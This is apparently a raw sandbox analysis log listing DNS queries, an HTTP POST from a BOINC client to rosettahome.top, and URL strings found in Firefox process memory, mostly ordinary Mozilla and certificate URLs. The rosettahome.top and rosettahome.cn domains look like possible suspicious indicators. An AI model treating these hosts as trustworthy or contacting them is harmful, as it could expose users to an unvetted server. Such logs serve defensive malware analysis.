Source: global trafficDNS traffic detected: DNS query: services.addons.mozilla.org
Source: global trafficDNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global trafficDNS traffic detected: DNS query: normandy-cdn.services.mozilla.com
Source: global trafficDNS traffic detected: DNS query: rosettahome.top
Source: global trafficDNS traffic detected: DNS query: boinc.berkeley.edu
Source: global trafficDNS traffic detected: DNS query: rosettahome.cn
Source: unknownHTTP traffic detected: POST /rosettahome_cgi/cgi HTTP/1.1Host: rosettahome.topUser-Agent: BOINC client (windows_x86_64 8.0.2)Accept: */*Accept-Encoding: deflate, gzipContent-type: text/xmlContent-Length: 5860
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/pagesNumSampledVisits
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/proposedDurationhttp://mozilla.org/#/properties/appName
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialog
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestarts
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredIndex
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/recordNavigationalSuggestionTelemetry
Source: firefox.exe, 00000003.00000003.2027247124.000001CA0CE94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/richSuggestionsFeatureGate
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/schemaVersion
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/serpEventTelemetryEnabled
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CEAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/showPreferencesEntrypoint
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGate
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/slug
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/startDate
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/targeting
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/trendingMaxResultsNoSearchMode
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/trendingRequireSearchMode
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/userFacingName
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/weatherFeatureGate
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLength
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCap
Source: firefox.exe, 00000003.00000003.1997307852.00002484CB303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2000847293.000035CDA6803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/)
Source: firefox.exe, 00000003.00000003.1997307852.00002484CB303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/.Z
Source: firefox.exe, 00000003.00000003.1773377124.00003D30A6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1770413347.0000331419603000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/0
Source: firefox.exe, 00000003.00000003.1915582603.000025D898603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1919592458.00003B7B7EB04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/03x
Source: firefox.exe, 00000003.00000003.1569147524.000001CA14FC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1478676467.000001CA15B36000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1677238252.000001CA0EA9C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1579874813.000001CA19644000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1750634615.000001CA0DFB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2010688164.000001CA0B5D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1569147524.000001CA14FB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1579874813.000001CA1964B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1931860870.000001CA0EB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1706743059.000001CA0EB74000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1754777749.000001CA0BBA1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1604994273.000001CA19743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1579874813.000001CA19654000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1808462601.000001CA0EB79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1529691013.000001CA199C5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1529691013.000001CA199CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1449853441.000001CA0C1E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1742840443.000001CA19661000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1481204041.000001CA0B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 
00000003.00000003.1510026280.000001CA0C1C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1516187370.000001CA0B3C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 00000003.00000003.1915582603.000025D898603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1919592458.00003B7B7EB04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1773377124.00003D30A6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1770413347.0000331419603000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/Z
Source: firefox.exe, 00000003.00000003.1571508369.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1529549564.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1568029139.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1541778340.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1562356175.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1566973694.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1547716853.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1552358255.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digice
Source: firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AEC5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1529549564.000001CA0AEB8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1545926516.000001CA0AEB7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0C
Source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0N
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1539926673.000001CA0AECA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1522082697.000001CA0AE90000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000003.00000003.1946711213.000001CA15B56000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://ocsp.thawte.com0
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 00000003.00000003.1631784458.000001CA19C34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1603987810.000001CA19C38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1682450384.000001CA19C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0
Source: firefox.exe, 00000003.00000003.1631784458.000001CA19C34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1603987810.000001CA19C38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1682450384.000001CA19C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 00000003.00000003.1946711213.000001CA15B56000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://www.mozilla.com0
Source: firefox.exe, 00000003.00000003.1624172725.000001CA1984E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 00000003.00000003.1674522956.000001CA0EED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000003.00000003.2018426889.000001CA0B0D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2007548489.000001CA0BB95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1755320173.000001CA0BB86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1806707177.000001CA7FE0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1754304730.000001CA0BBC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2018426889.000001CA0B0A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000003.00000003.2007548489.000001CA0BB95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1755320173.000001CA0BB86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulC
Source: firefox.exe, 00000003.00000003.2043753666.000001CA7CF8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
Source: firefox.exe, 00000008.00000003.1468272975.00000271263FC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2666636998.00000271263FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.videolan.org/x264.html
Source: firefox.exe, 00000003.00000003.1603987810.000001CA19C38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1682450384.000001CA19C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000003.00000003.1603987810.000001CA19C38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1682450384.000001CA19C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000003.00000003.1674522956.000001CA0EEC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
Source: firefox.exe, 00000003.00000003.1442898301.000001CA09321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1442612663.000001CA09000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000003.00000003.2017504175.000001CA0B167000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000003.00000003.1645054810.000001CA7FE0F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1504434772.000001CA0C2E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2102737389.000001CA085A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1827373381.000001CA7FFCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2023659253.000001CA085A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000003.00000003.1504434772.000001CA0C2CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/en-US/firefox/collections/4757633/25c2b44583534b3fa8fea977c419cd/?page=1&
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/addon/reddit-enhancement-suite/
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/addon/wikipedia-context-menu-search/
Source: firefox.exe, 00000003.00000003.1789387545.000001CA19798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpi
Source: firefox.exe, 00000003.00000003.1789387545.000001CA19798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi
Source: firefox.exe, 00000003.00000003.1789387545.000001CA19798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpi
Source: firefox.exe, 00000003.00000003.1789387545.000001CA19798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed
Source: firefox.exe, 00000003.00000003.1789387545.000001CA19798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed
Source: firefox.exe, 00000003.00000003.1789387545.000001CA19798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956
Source: firefox.exe, 00000003.00000003.2027247124.000001CA0CE94000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2093134412.000001CA0B5D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads-us.rd.linksynergy.com/as.php
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1672954302.000001CA0F12C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.adjust.com/167k4ih?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.adjust.com/a8bxj8j?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht
Source: firefox.exe, 00000003.00000003.1528174370.000001CA1B1CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2010169585.000001CA0B623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000003.00000003.1645389070.000001CA1B1DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000003.00000003.1826416115.000001CA0BEE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/GMP/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Win
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000003.00000003.1645054810.000001CA7FE0F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2102737389.000001CA085A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2023659253.000001CA085A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000003.00000003.1571508369.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1558216014.000001CA0AEB7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1564754564.000001CA0AEB7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1522082697.000001CA0AE90000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1547716853.000001CA0AEB8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1545926516.000001CA0AEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
Source: firefox.exe, 00000003.00000003.1529691013.000001CA199CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mths.be/jsesc
